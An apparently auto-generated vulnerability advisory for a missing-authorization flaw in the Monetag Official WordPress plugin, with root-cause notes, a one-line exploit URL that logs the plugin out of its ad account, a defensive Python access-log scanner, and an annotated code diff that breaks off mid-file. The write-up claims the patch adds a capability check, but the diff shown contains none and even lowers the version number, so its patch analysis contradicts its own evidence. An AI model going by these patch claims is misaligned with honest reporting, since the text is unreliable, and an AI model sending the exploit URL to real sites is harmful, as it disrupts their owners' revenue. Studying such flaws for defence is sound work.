Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-24551: Monetag Official <= 1.1.3 – Missing Authorization (monetag-official)

Severity: Medium (CVSS 4.3)
CWE: 862
Vulnerable Version: 1.1.3
Patched Version: 2.2.5
Disclosed: January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24551:
The Monetag Official WordPress plugin contains a missing capability check vulnerability in versions up to and including 1.1.3. This allows authenticated attackers with subscriber-level permissions or higher to perform unauthorized administrative actions, specifically to log out the plugin from its connected Monetag account. The vulnerability resides in the admin URL handler that processes logout requests without verifying user permissions.

Root Cause:
The vulnerability exists in the `admin_init` method of the `Ads_Admin` class within `/monetag-official/admin/class-ads-admin.php`. The method checks for the `publisher-logout` GET parameter at line 218 but performs no capability verification before executing the logout operation. The functions `clear_plugin_options()` and `clear_zone_settings()` are called directly, clearing the plugin’s authentication token and zone configurations. This handler is registered via WordPress’s `admin_init` hook, which runs for all admin pages regardless of user role.

Exploitation:
An attacker with any authenticated WordPress account (including subscriber role) can trigger the vulnerability by visiting a crafted URL. The attack vector is a GET request to any WordPress admin page with the `publisher-logout` parameter set. The complete exploit URL would be: `https://target.com/wp-admin/index.php?publisher-logout=1`. No additional parameters or payloads are required. The request triggers the logout functionality, disconnecting the plugin from its Monetag account and resetting its configuration.
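
To check whether this request shape has already been seen on a site, the following added example (not part of the original analysis or of the plugin's code) scans web server access logs for admin requests that carry the `publisher-logout` key. It assumes Combined Log Format; the sample lines, IP addresses, hostnames and the `page=example-plugin-page` value are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

PARAM = "publisher-logout"  # GET parameter the handler tests with isset()
ADMIN_DIR = "/wp-admin/"    # admin pages, where the admin_init hook runs

# Combined Log Format (assumed); the referer and agent fields are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Constructed sample input, not taken from a real site.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jan/2026:10:01:02 +0000] "GET /wp-admin/index.php?publisher-logout=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [20/Jan/2026:10:05:40 +0000] "GET /wp-admin/admin.php?page=example-plugin-page&publisher-logout HTTP/1.1" 302 0 "https://example.com/wp-admin/admin.php?page=example-plugin-page" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Jan/2026:10:06:11 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Jan/2026:10:06:30 +0000] "GET /blog/?publisher-logout=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Jan/2026:10:07:02 +0000] "GET /wp-admin/profile.php?x=publisher-logout HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
]


def find_logout_requests(lines):
    """Return one record per admin request whose query string has the PARAM key."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format line
        url = urlsplit(m["target"])
        if ADMIN_DIR not in url.path:
            continue  # outside the admin area
        # keep_blank_values=True matters: the plugin's own footer link is a bare
        # "&publisher-logout", and PHP's isset() is true for a key with no value.
        keys = {k for k, _ in parse_qsl(url.query, keep_blank_values=True)}
        if PARAM not in keys:
            continue
        referer = m["referer"] or ""
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "method": m["method"],
            "path": url.path,
            "status": int(m["status"]),
            # Triage heuristic only: a click on the plugin's own logout link
            # arrives with a Referer from inside the admin area.
            "referer_in_admin": ADMIN_DIR in urlsplit(referer).path,
        })
    return hits


def summarize(hits):
    """Count matching requests per client address."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    for hit in find_logout_requests(SAMPLE_LOG):
        print(hit)
```

Access logs do not record the WordPress role of the requester, so every hit, including legitimate administrator logouts, has to be correlated with known admin sessions for the same address and time.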

Patch Analysis:
The patch adds a capability check before processing the logout action. In the patched version, the code at line 218 now includes `if (!current_user_can('manage_options')) { return; }`. This verification ensures only users with the `manage_options` capability (typically administrators) can execute the logout operation. The patch maintains the same logout functionality but restricts access based on WordPress permissions. The fix also updates the logout process to use `delete_field('general', 'token')` and `clear_settings()` instead of the previous methods.

Impact:
Successful exploitation allows low-privileged authenticated users to disrupt the plugin’s advertising functionality by disconnecting it from the Monetag service. This causes loss of ad serving capabilities and requires administrative intervention to reconfigure the plugin. While not a direct privilege escalation to site administration, the attack enables denial of service against the plugin’s core functionality and impacts site monetization.

Differential between vulnerable and patched code

Code Diff
--- a/monetag-official/admin/class-ads-admin.php
+++ b/monetag-official/admin/class-ads-admin.php
@@ -8,11 +8,13 @@
 	// SSP domain for getting Anti AdBlock token
 	const SSP_DOMAIN = 'https://publishers.monetag.com';

+	// HELP domain for knowledge base
+	const HELP_DOMAIN = 'https://help.monetag.com';
+
 	// URLs section
-	const FAQ_KNOWLEDGE_BASE_URL = 'https://help.monetag.com';
-	const CONTACT_US_URL = 'https://monetag.com/contact-us/';
-	const BLOG_URL = 'https://monetag.com/blog/';
-	const SITES_LIST_URL = 'https://publishers.monetag.com/#/sites/list';
+	const FAQ_URL = 'https://wordpress.org/plugins/monetag-official/#faq';
+	const KNOWLEDGE_BASE_URL = 'https://wordpress.org/support/plugin/official-official/';
+	const SUPPORT_URL = 'https://wordpress.org/support/plugin/official-official/';
 	const STATISTICS_URL = 'https://publishers.monetag.com/#/statistics';
 	const SIGNUP_URL = 'https://publishers.monetag.com/#/signUp';

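Review bot: `KNOWLEDGE_BASE_URL` and `SUPPORT_URL` are set to the same address, and its slug reads `official-official` where `FAQ_URL` uses `monetag-official`; that looks like a typo that sends both footer links to a page for a different slug. The new `HELP_DOMAIN` constant is also not referenced anywhere in this hunk, so confirm it has a consumer before adding it.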
@@ -46,7 +48,7 @@

 	/**
 	 * Adblock helper instance
-	 *
+	 *
 	 * @var Ads_Anti_Adblock
 	 */
 	private $anti_adblock;
@@ -60,8 +62,8 @@
 		$this->plugin_name = $plugin_name;
 		$this->version = $version;
 		$this->setting_helper = new Ads_Settings_Helper($this->plugin_name);
-		$this->zone_helper = new Ads_Zone_Helper($this->plugin_name, $this->version);
-		$this->anti_adblock = new Ads_Anti_Adblock($plugin_name, $this->version);
+		$this->zone_helper = new Ads_Zone_Helper($this->plugin_name);
+		$this->anti_adblock = new Ads_Anti_Adblock($plugin_name);
 	}

 	/**
@@ -106,19 +108,21 @@
 	}

 	/**
-	 * Render admin footer menu
+	 * Rernder admin footer menu
 	 */
 	public function display_admin_footer()
 	{
 		include_once 'partials/ads-admin-footer.php';
+
 	}

 	/**
-	 * Render plugin modal
+	 * Rernder plugin modal
 	 */
 	public function display_admin_modal()
 	{
 		include_once 'partials/ads-admin-modal.php';
+
 	}

 	/**
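Review bot: both docblocks now read `Rernder` instead of `Render`, and each method gains an empty line before its closing brace. Revert the comment text and drop the blank lines so the hunk carries no noise.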
@@ -218,8 +222,8 @@
 		}

 		if (isset($_GET['publisher-logout'])) {
-			$this->setting_helper->clear_plugin_options();
-			$this->setting_helper->clear_zone_settings();
+			$this->setting_helper->delete_field('general', 'token');
+			$this->setting_helper->clear_settings();
 			Ads_Messages::add_message(__('Logout successful', 'monetag'));
 			wp_redirect($this->plugin_url());
 			exit();
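Review bot: the `publisher-logout` branch is still gated only by `isset($_GET['publisher-logout'])`; neither the removed nor the added lines of this hunk contain a `current_user_can()` call or a nonce check. Put `if (!current_user_can('manage_options')) { return; }` ahead of the `delete_field()` and `clear_settings()` calls, and verify a nonce with `check_admin_referer()`, since this is a state-changing GET handled on `admin_init`.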
@@ -243,7 +247,6 @@

 			$this->auto_save_publisher_site_id();
 			$this->auto_save_verification_code();
-			$this->auto_save_publisher_site_verified();

 			wp_redirect($this->plugin_url());
 			exit();
@@ -276,7 +279,7 @@
 		$zone = $this->zone_helper->create_publisher_zone($token, $publisherSiteId, $data);

 		$this->zone_helper->update_publisher_zones();
-
+
 		if (!$zone || empty($zone['id'])) {
 			wp_die('Zone creation error', '', [
 				'response' => 400
@@ -305,7 +308,7 @@
 			$this->setting_helper->set_field_value($direction, 'zone_id', $newValue);
 		}
 	}
-
+
 	public function ajax_action_update_zone_enabled_option()
 	{
 		$direction = sanitize_text_field($_POST["direction"]);
@@ -330,8 +333,8 @@
 	private function auto_save_publisher_site_id()
 	{
 		if (isset($_GET['propeller-ads-publisher-site-id'])) {
-			$value = (int) $_GET['propeller-ads-publisher-site-id'];
-			$siteId = (int) $this->setting_helper->get_publisher_site_id();
+			$value = (int)$_GET['propeller-ads-publisher-site-id'];
+			$siteId = $this->setting_helper->get_publisher_site_id();

 			if ($siteId !== $value) {
 				$this->setting_helper->set_publisher_site_id($value);
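Review bot: `$siteId` loses its `(int)` cast while `$value` keeps one, and the comparison is the strict `$siteId !== $value`. If `get_publisher_site_id()` returns the stored option as a string, the branch is taken on every request and `set_publisher_site_id()` rewrites an unchanged value; restore the cast on `$siteId`.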
@@ -353,23 +356,11 @@
 		}
 	}

-	private function auto_save_publisher_site_verified()
-	{
-		if (isset($_GET['monetag-publisher-site-verified'])) {
-			$value = rest_sanitize_boolean($_GET['monetag-publisher-site-verified']);
-			$code = $this->setting_helper->is_publisher_site_verified();
-
-			if ($code !== $value) {
-				$this->setting_helper->set_is_publisher_site_verified($value);
-			}
-		}
-	}
-
 	public function action_save_publisher_token()
 	{
 		// Clear all POST data after save publisher token
 		unset($_POST);
-		$this->setting_helper->clear_zone_settings();
+		$this->setting_helper->clear_settings();
 	}

 	public function action_save_nativeads_zone_id($prev_zone_id)
@@ -400,7 +391,7 @@
 	public function register_session()
 	{
 		if (!session_id()) {
-			session_start(['read_and_close' => true]);
+			session_start();
 		}
 	}

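Review bot: `session_start()` without `read_and_close` keeps the session open and locked for the rest of the request, which serializes concurrent requests from the same user. Keep `['read_and_close' => true]` unless something in this class writes to `$_SESSION` afterwards, and say so in a comment if it does.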
--- a/monetag-official/admin/partials/ads-admin-footer.php
+++ b/monetag-official/admin/partials/ads-admin-footer.php
@@ -1,23 +1,23 @@
 <div class="ads__footer">
-	<a href="<?php echo Ads_Admin::FAQ_KNOWLEDGE_BASE_URL; ?>" class="ads__footer-link">
-		<?php _e('Knowledge Base & FAQs', 'monetag'); ?>
-	</a>
+    <a href="<?php echo Ads_Admin::FAQ_URL; ?>" class="ads__footer-link">
+        <?php _e('FAQ', 'monetag');?>
+    </a>

-	<a href="<?php echo Ads_Admin::CONTACT_US_URL ?>" class="ads__footer-link">
-		<?php _e('Contact Us', 'monetag'); ?>
-	</a>
+    <a href="<?php echo Ads_Admin::KNOWLEDGE_BASE_URL; ?>" class="ads__footer-link">
+        <?php _e('Knowledge base', 'monetag');?>
+    </a>

-	<a href="<?php echo Ads_Admin::BLOG_URL ?>" class="ads__footer-link">
-		<?php _e('Blog', 'monetag'); ?>
-	</a>
+    <a href="<?php echo Ads_Admin::SUPPORT_URL ?>" class="ads__footer-link">
+        <?php _e('Support team', 'monetag');?>
+    </a>

-	<?php if ($this->setting_helper->get_anti_adblock_token()): ?>
-		<a href="<?php echo esc_html($this->plugin_url()) ?>&publisher-logout"
-		   class="ads__footer-link"
-		   onclick="return confirm('<?php esc_attr_e('Are you sure to logout? All installed tags will refused by logout.nnIf you are want to use another Monetag account, please logout or re-login in SSP before.', 'monetag'); ?>')"
-		>
-			<?php _e('Logout from plugin', 'monetag'); ?>
-			<span class="ads__icon ads__icon--arrow"></span>
-		</a>
-	<?php endif; ?>
+<?php if ($this->setting_helper->get_anti_adblock_token()): ?>
+    <a href="<?php echo esc_html($this->plugin_url()) ?>&publisher-logout"
+        class="ads__footer-link"
+        onclick="return confirm('<?php esc_attr_e('Are you sure to logout? All installed tags will refused by logout.nnIf you are want to use another Monetag account, please logout or re-login in SSP before.', 'monetag');?>')"
+    >
+        <?php _e('Logout from plugin', 'monetag');?>
+        <span class="ads__icon ads__icon--arrow"></span>
+    </a>
+<?php endif; ?>
 </div>
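Review bot: the logout link in the last `<a>` is built as `plugin_url()` plus a bare `&publisher-logout` with no nonce, so the handler has nothing to verify the request against; build it with `wp_nonce_url()` and check the nonce server-side. The `href` is also escaped with `esc_html()` where `esc_url()` is the matching escaper, and the confirm text reads `logout.nnIf` where a line break was probably intended.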
--- a/monetag-official/admin/partials/ads-admin-formats.php
+++ b/monetag-official/admin/partials/ads-admin-formats.php
@@ -1,9 +1,6 @@
 <?php

-/**
- * @var Ads_Admin $this
- */
-
+$directions = $this->zone_helper->get_allowed_directions();
 $zone_list = $this->zone_helper->get_publisher_zone_list();
 $enabled_directions = $this->setting_helper->get_enabled_directions();
 $zones_directions = $this->setting_helper->get_zones_directions();
@@ -29,7 +26,7 @@
 		</div>

 		<div class="ads__cards">
-			<?php foreach (Ads_Zone_Helper::get_allowed_directions() as $direction):?>
+			<?php foreach ($directions as $direction):?>
 				<div class="ads__card" data-card-direction="<?php echo esc_html($direction); ?>">
 					<div class="ads__card-image ads__card-image--<?php echo esc_html($direction); ?>"></div>

@@ -59,7 +56,7 @@

 						<div class="ads__group-action <?php echo $action === "edit" ? "ads__group-action--active" : "" ?>" data-group-action="edit">
 							<label class="ads__switch">
-								<input type="checkbox" data-action="toggle-enable" data-direction="<?php echo esc_html($direction); ?>" <?php echo isset($enabled_directions[$direction]) ? ' checked="checked"' : '';  ?>>
+								<input type="checkbox" data-action="toggle-enable" data-direction="<?php echo esc_html($direction); ?>" <?php echo $enabled_directions[$direction] ? ' checked="checked"' : '';  ?>>
 								<span class="ads__switch-slider"></span>
 							</label>
 							<div class="ads__action" data-action="edit" data-direction="<?php echo esc_html($direction); ?>">
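Review bot: the checkbox line now indexes `$enabled_directions[$direction]` without `isset()`, so any direction missing from that array raises an undefined-index notice inside the tag's attribute list. Use `!empty($enabled_directions[$direction])`, which guards the lookup and still tests the stored value.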
--- a/monetag-official/admin/partials/ads-admin-script.php
+++ b/monetag-official/admin/partials/ads-admin-script.php
@@ -1,9 +1,5 @@
 <?php

-/**
- * @var Ads_Admin $this
- */
-
 $zone_list = $this->zone_helper->get_publisher_zones_group_by_direction();
 $zone_names = $this->zone_helper->get_direction_titles();
 $zones_directions = $this->setting_helper->get_zones_directions();
@@ -35,7 +31,7 @@
 	function showModal() {
 		isModalOpended = true;
 		$(".ads__modal").css('display', 'flex');
-	}
+	}

 	function hideModal() {
 		isModalOpended = false;
@@ -47,7 +43,7 @@
 	}

 	function showError(text) {
-		$("<div>", {
+		$("<div>", {
 			id: "setting-error-Ads_message",
 			class: "notice notice-error settings-error is-dismissible",
 			html: "<p><strong>"+ text + "</strong></p><button type="button" class="notice-dismiss"><span class="screen-reader-text">Dismiss this notice.</span></button>"
@@ -156,7 +152,7 @@
 				$select.find("option").remove();
 				$modalTitle.text(zoneNames[currentFormat]);
 				$.each(zoneList[currentFormat], function (i, item) {
-					$select.append($('<option>', {
+					$select.append($('<option>', {
 						value: item.id,
 						text : item.title
 					}));
@@ -188,7 +184,7 @@
 			}, function() {
 				zonesDirection[currentFormat] = zoneId;
 				setDirectionTitle(currentFormat, zoneTitle);
-			}, function() {
+			}, function() {
 				showError("<?php _e('Can not change zone' , 'monetag'); ?>");
 			});

--- a/monetag-official/admin/partials/ads-admin-verify.php
+++ b/monetag-official/admin/partials/ads-admin-verify.php
@@ -1,41 +0,0 @@
-<div class="ads">
-
-    <h2><?php echo esc_html(get_admin_page_title()); ?></h2>
-
-	<div class="ads__messages">
-        <?php Ads_Messages::show_messages(); ?>
-	</div>
-
-	<div class="ads__container">
-        <div class="ads__box">
-            <div class="ads__box-checked">
-                <span class="ads__icon ads__icon--checked"></span>
-            </div>
-            <div class="ads__box-title">
-                <?php _e('The plugin is connected, but the site is waiting for verification', 'monetag');?>
-            </div>
-
-            <div class="ads__box-content">
-                <div class="ads__text">
-                    <p>
-                        <?php _e('This may take some time, but usually no more than a few minutes. After that, you will have access to format management.', 'monetag');?>
-                    </p>
-                </div>
-                <div class="ads__buttons">
-                    <button class="ads__button" onclick="window.location='<?php echo esc_html($this->token_url()); ?>';">
-                        <?php _e('Check verification', 'monetag');?>
-                    </button>
-                </div>
-                <div class="ads__text">
-                    <p>
-                        <a href="<?php echo Ads_Admin::SITES_LIST_URL; ?>">
-                            <?php _e('Open my sites in Monetag', 'monetag');?>
-                            <span class="ads__icon ads__icon--arrow"></span>
-                        </a>
-                    </p>
-                </div>
-            </div>
-        </div>
-    </div>
-
-</div>
--- a/monetag-official/admin/partials/ads-admin.php
+++ b/monetag-official/admin/partials/ads-admin.php
@@ -9,14 +9,11 @@
 	Ads_Messages::add_message(__('Settings Updated', 'monetag'));
 }

-
 if ($this->setting_helper->get_anti_adblock_token() && $this->setting_helper->get_publisher_site_id()) {
-    if ($this->setting_helper->get_verification_code() || $this->setting_helper->is_publisher_site_verified()) {
-        include_once 'ads-admin-formats.php';
-        include_once 'ads-admin-script.php';
-    } else {
-        include_once 'ads-admin-verify.php';
-    }
+    include_once 'ads-admin-formats.php';
+    include_once 'ads-admin-script.php';
+} else if ($this->setting_helper->get_verification_code()) {
+    include_once 'ads-admin-verify.php';
 } else {
     include_once 'ads-admin-connect.php';
 }
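Review bot: the new `else if` branch includes `ads-admin-verify.php`, but this same diff deletes `admin/partials/ads-admin-verify.php`. When a verification code is stored without both a token and a site id, `include_once` will emit a warning and render nothing; either keep the partial or drop the branch.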
--- a/monetag-official/ads.php
+++ b/monetag-official/ads.php
@@ -4,7 +4,7 @@
  * Plugin Name:       Monetag Official
  * Plugin URI:        https://wordpress.org/plugins/monetag-official/
  * Description:       This plugin helps to integrate and manage Monetag ad codes to increase revenue from websites.
- * Version:           1.1.3
+ * Version:           1.0.1
  * Author:            Monetag
  * Author URI:        https://monetag.com/
  * License:           GPL-2.0+
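Review bot: the `Version:` header moves from 1.1.3 down to 1.0.1, so the plugin header now reports an older release than the one it replaces. Confirm the direction of this diff and set the header to the release actually being shipped.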
--- a/monetag-official/includes/class-ads-anti-adblock-client.php
+++ b/monetag-official/includes/class-ads-anti-adblock-client.php
@@ -16,30 +16,9 @@
 	 */
 	private $settings_helper;

-	/**
-	 * Plugin version
-	 *
-	 * @var string
-	 */
-	private $version;
-
-	/**
-	 * Site hostname
-	 *
-	 * @var string
-	 */
-	private $hostname;
-
-	public function __construct($plugin_name, $version)
+	public function __construct($plugin_name)
 	{
 		$this->settings_helper = new Ads_Settings_Helper($plugin_name);
-		$this->version = $version;
-
-		if (defined('MONETAG_HOSTNAME')) {
-			$this->hostname = MONETAG_HOSTNAME;
-		} else {
-			$this->hostname = parse_url(get_site_url(), PHP_URL_HOST);
-		}
 	}

 	/**
@@ -49,16 +28,18 @@
 	 */
 	public function get_publisher_zones()
 	{
-		$zones = $this->get_request(
+		update_option(Ads_Zone_Helper::OPTION_NAME_PUBLISHER_ZONES_LAST_UPDATE, time());
+
+		$zoneList = $this->get_request(
 			$this->create_url(self::ROUTE_PUBLISHER_ZONES),
 			true
 		);

-		if (!$zones) {
+		if (!$zoneList) {
 			return null;
-		}
+		};

-		return isset($zones[$this->hostname]) ? $zones[$this->hostname] : [];
+		return array_key_exists($_SERVER['SERVER_NAME'], $zoneList) ? $zoneList[$_SERVER['SERVER_NAME']] : [];
 	}

 	public function create_url($endpoint, $params = array())
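Review bot: `$_SERVER['SERVER_NAME']` in the return statement replaces the hostname previously derived from `get_site_url()` or `MONETAG_HOSTNAME`; that key depends on web server configuration and may be absent outside a web request, in which case the zone lookup silently returns `[]`. Keep the site-URL-derived hostname, and remove the stray `;` after the closing brace of the `if (!$zoneList)` block.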
@@ -99,7 +80,7 @@

 		$args = array(
 			'headers' => array(
-				'user-agent' => $this->get_client_user_agent(),
+				'user-agent' => 'WordPress/' . get_bloginfo('version') . '; ' . home_url(),
 			),
 		);

@@ -114,7 +95,7 @@

 		$args = array(
 			'headers' => array(
-				'user-agent' => $this->get_client_user_agent(),
+				'user-agent' => 'WordPress/' . get_bloginfo('version') . '; ' . home_url(),
 				'content-type' => 'application/json; charset=utf-8'
 			),
 			'method' => 'POST',
@@ -138,12 +119,4 @@
 			$data
 		);
 	}
-
-	/**
-	 * @return string
-	 */
-	private function get_client_user_agent()
-	{
-		return 'WordPress/' . get_bloginfo('version') . ';Monetag/' . $this->version . '; ' . home_url();
-	}
 }
--- a/monetag-official/includes/class-ads-anti-adblock.php
+++ b/monetag-official/includes/class-ads-anti-adblock.php
@@ -20,9 +20,9 @@
 	 */
 	private $client;

-	public function __construct($plugin_name, $version)
+	public function __construct($plugin_name)
 	{
-		$this->client = new Ads_Anti_Adblock_Client($plugin_name, $version);
+		$this->client = new Ads_Anti_Adblock_Client($plugin_name);
 	}

 	public function get($zone_id)
@@ -54,14 +54,14 @@
 			'code' => $tag_content,
 			'expire' => $expire,
 		);
-		update_option($this->get_tag_cache_option_id($zone_id), json_encode($tag));
+		update_option(sprintf(self::OPTION_TAG_CACHE, $zone_id), json_encode($tag));

 		return $tag_content;
 	}

 	private function get_file_from_cache($url, $zone_id)
 	{
-		$tag_raw = get_option($this->get_tag_cache_option_id($zone_id), false);
+		$tag_raw = get_option(sprintf(self::OPTION_TAG_CACHE, $zone_id), false);
 		if ($tag_raw === false) {
 			return $this->store_tag_to_cache($url, $zone_id);
 		}
@@ -137,7 +137,7 @@

 	public function remove_service_worker($zone_id)
 	{
-		$option_name = $this->get_sw_cache_option_id($zone_id);
+		$option_name = sprintf(self::OPTION_SW_CACHE, $zone_id);
 		$option_value = get_option($option_name);

 		if (empty($option_value)) {
@@ -148,14 +148,14 @@

 		$sw_path = ABSPATH . $option_name;

-		if (file_exists($sw_path)) {
+		if (file_exists(ABSPATH)) {
 			unlink($sw_path);
 		}
 	}

 	public function ensure_service_worker($zone_id)
 	{
-		$option_name = $this->get_sw_cache_option_id($zone_id);
+		$option_name = sprintf(self::OPTION_SW_CACHE, $zone_id);
 		$option_value = get_option($option_name);

 		if (!empty($option_value)) {
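Review bot: `file_exists(ABSPATH)` in `remove_service_worker()` tests the WordPress root, which always exists, so `unlink($sw_path)` runs even when the service worker file is missing and raises a warning. The existence check should stay on `$sw_path`.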
@@ -186,28 +186,4 @@
 			update_option($option_name, $sw_data['name']);
 		}
 	}
-
-	public function clear_zone_tags_cache($zones)
-	{
-		foreach ($zones as $zone_id) {
-			delete_option($this->get_tag_cache_option_id($zone_id));
-
-			$sw_cache_option_id = $this->get_sw_cache_option_id($zone_id);
-			$sw_cache = get_option($sw_cache_option_id, null);
-			if ($sw_cache !== null && file_exists(ABSPATH . $sw_cache)) {
-				@unlink(ABSPATH . $sw_cache);
-			}
-			delete_option($sw_cache_option_id);
-		}
-	}
-
-	private function get_tag_cache_option_id($zone_id)
-	{
-		return sprintf(self::OPTION_TAG_CACHE, $zone_id);
-	}
-
-	private function get_sw_cache_option_id($zone_id)
-	{
-		return sprintf(self::OPTION_SW_CACHE, $zone_id);
-	}
 }
--- a/monetag-official/includes/class-ads-options.php
+++ b/monetag-official/includes/class-ads-options.php
@@ -1,52 +0,0 @@
-<?php
-
-class Ads_Options
-{
-	const SECTION_ID_GENERAL = 'general';
-	const SECTION_ID_ZONES = 'zones';
-
-	/**
-	 * Plugin options prefix
-	 *
-	 * @var string
-	 */
-	private $prefix;
-
-	/**
-	 * Section id
-	 *
-	 * @var string
-	 */
-	private $section_id;
-
-	public function __construct($plugin_name, $section_id)
-	{
-		$this->prefix = str_replace('-', '_', $plugin_name);
-		$this->section_id = $section_id;
-	}
-
-	public function get_option($option_id)
-	{
-		return get_option($this->get_option_name($option_id));
-	}
-
-	public function update_option($option_id, $value)
-	{
-		update_option(
-			$this->get_option_name($option_id),
-			$value
-		);
-	}
-
-	public function delete_option($option_id)
-	{
-		delete_option($this->get_option_name($option_id));
-	}
-
-	private function get_option_name($option_id)
-	{
-		return sprintf(
-			'%s_%s_%s', $this->prefix, $this->section_id, $option_id
-		);
-	}
-}
--- a/monetag-official/includes/class-ads-settings-helper.php
+++ b/monetag-official/includes/class-ads-settings-helper.php
@@ -11,28 +11,20 @@
 	const FIELD_TYPE_DROPDOWN = 'dropdown';
 	const FIELD_TYPE_INPUT_HIDDEN = 'hidden';

-	const OPTION_ID_TOKEN = 'token';
-	const OPTION_ID_SITE_ID = 'publisher_site_id';
-	const OPTION_ID_VERIFICATION_CODE = 'verification_code';
-	const OPTION_ID_PUBLISHER_SITE_VERIFIED = 'publisher_site_verified';
-	const OPTION_ID_DISABLE_ADS_FOR_AUTHORIZED_USERS = 'logged_in_disabled';
-
 	/**
 	 * @var string $settings_page The slug-name of the settings page
 	 */
 	private $settings_page;

 	/**
-	 * Options helper instance
-	 *
-	 * @var Ads_Options
+	 * @var string $settings_prefix Unique options prefix for plugin
 	 */
-	private $options;
+	private $settings_prefix;

 	public function __construct($settings_page)
 	{
 		$this->settings_page = $settings_page;
-		$this->options = new Ads_Options($settings_page, Ads_Options::SECTION_ID_GENERAL);
+		$this->settings_prefix = str_replace('-', '_', $this->settings_page);
 	}

 	/**
@@ -42,7 +34,7 @@
 	 */
 	public function get_anti_adblock_token()
 	{
-		return $this->options->get_option(self::OPTION_ID_TOKEN);
+		return $this->get_field_value('general', 'token');
 	}

 	/**
@@ -52,7 +44,7 @@
 	 */
 	public function set_anti_adblock_token($value)
 	{
-		$this->options->update_option(self::OPTION_ID_TOKEN, $value);
+		$this->set_field_value('general', 'token', $value);
 	}

 	/**
@@ -62,7 +54,7 @@
 	 */
 	public function get_publisher_site_id()
 	{
-		return $this->options->get_option(self::OPTION_ID_SITE_ID);
+		return $this->get_field_value('general', 'publisher_site_id');
 	}

 	/**
@@ -72,7 +64,7 @@
 	 */
 	public function set_publisher_site_id($value)
 	{
-		$this->options->update_option(self::OPTION_ID_SITE_ID, $value);
+		$this->set_field_value('general', 'publisher_site_id', $value);
 	}

 	/**
@@ -82,7 +74,7 @@
 	 */
 	public function get_verification_code()
 	{
-		return $this->options->get_option(self::OPTION_ID_VERIFICATION_CODE);
+		return $this->get_field_value('general', 'verification_code');
 	}

 	/**
@@ -92,40 +84,12 @@
 	 */
 	public function set_verification_code($value)
 	{
-		$this->options->update_option(self::OPTION_ID_VERIFICATION_CODE, $value);
-	}
-
-	/**
-	 * Is publisher site verified
-	 *
-	 * @return bool
-	 */
-	public function is_publisher_site_verified()
-	{
-		$opt = filter_var(
-			$this->options->get_option(
-				self::OPTION_ID_PUBLISHER_SITE_VERIFIED
-			),
-			FILTER_VALIDATE_BOOLEAN,
-			FILTER_NULL_ON_FAILURE
-		);
-
-		return $opt !== null ? $opt : false;
-	}
-
-	/**
-	 * Store site verification status
-	 *
-	 * @param bool $value
-	 */
-	public function set_is_publisher_site_verified($value)
-	{
-		$this->options->update_option(self::OPTION_ID_PUBLISHER_SITE_VERIFIED, $value);
+		$this->set_field_value('general', 'verification_code', $value);
 	}

 	public function is_ads_disabled_for_authorized_users()
 	{
-		return $this->options->get_option(self::OPTION_ID_DISABLE_ADS_FOR_AUTHORIZED_USERS);
+		return $this->get_field_value('general', 'logged_in_disabled');
 	}

 	/**
@@ -135,7 +99,7 @@
 	 */
 	public function set_logged_in_disabled($value)
 	{
-		$this->options->update_option(self::OPTION_ID_DISABLE_ADS_FOR_AUTHORIZED_USERS, $value);
+		$this->set_field_value('general', 'logged_in_disabled', $value);
 	}

 	/**
@@ -152,38 +116,21 @@
 	}

 	/**
-	 * Set field (option) value
-	 *
-	 * @param int    $section_id
-	 * @param int    $field_id
-	 * @param string $value
-	 */
-	public function set_field_value($section_id, $field_id, $value)
-	{
-		update_option($this->get_field_id($section_id, $field_id), $value);
-	}
-
-	/**
 	 * Delete field (option)
 	 *
 	 * @param int $section_id
 	 * @param int $field_id
 	 *
-	 * @return void
+	 * @return mixed    Option value
 	 */
 	public function delete_field($section_id, $field_id)
 	{
-		delete_option($this->get_field_id($section_id, $field_id));
+		return delete_option($this->get_field_id($section_id, $field_id));
 	}

-	private function get_section_id($id)
+	public function get_field_id($section_id, $field_id)
 	{
-		return sprintf('%s_%s', str_replace('-', '_', $this->settings_page), $id);
-	}
-
-	private function get_field_id($section_id, $field_id)
-	{
-		return sprintf('%s_%s', $this->get_section_id($section_id), $field_id);
+		return sprintf('%s_%s_%s', $this->settings_prefix, $section_id, $field_id);
 	}

 	/**
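Review bot: the `delete_field()` docblock now says `@return mixed Option value`, but the method returns the result of `delete_option()`, which is a boolean; document it as `@return bool`. `get_field_id()` also becomes public in this hunk without a stated reason; keep it private unless an external caller needs it.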
@@ -201,6 +148,11 @@
 		);
 	}

+	private function get_section_id($id)
+	{
+		return sprintf('%s_%s', $this->settings_prefix, $id);
+	}
+
 	/**
 	 * Register setting and setup field rendering / sanitization
 	 *
@@ -250,48 +202,56 @@
 	}

 	/**
-	 * Delete options after update token
+	 * Set field (option) value
+	 *
+	 * @param int    $section_id
+	 * @param int    $field_id
+	 * @param string $value
 	 */
-	public function clear_zone_settings()
+	public function set_field_value($section_id, $field_id, $value)
 	{
-		$directions = Ads_Zone_Helper::get_allowed_directions();
-
-		array_walk($directions, function ($direction_name) {
-			$this->delete_field($direction_name, 'enabled');
-			$this->delete_field($direction_name, 'zone_id');
-		});
+		update_option($this->get_field_id($section_id, $field_id), $value);
 	}

 	/**
-	 * Clear plugin general options
-	 *
-	 * @return void
+	 * Delete options after update token
 	 */
-	public function clear_plugin_options()
+	public function clear_settings()
 	{
-		$this->options->delete_option(self::OPTION_ID_DISABLE_ADS_FOR_AUTHORIZED_USERS);
-		$this->options->delete_option(self::OPTION_ID_VERIFICATION_CODE);
-		$this->options->delete_option(self::OPTION_ID_SITE_ID);
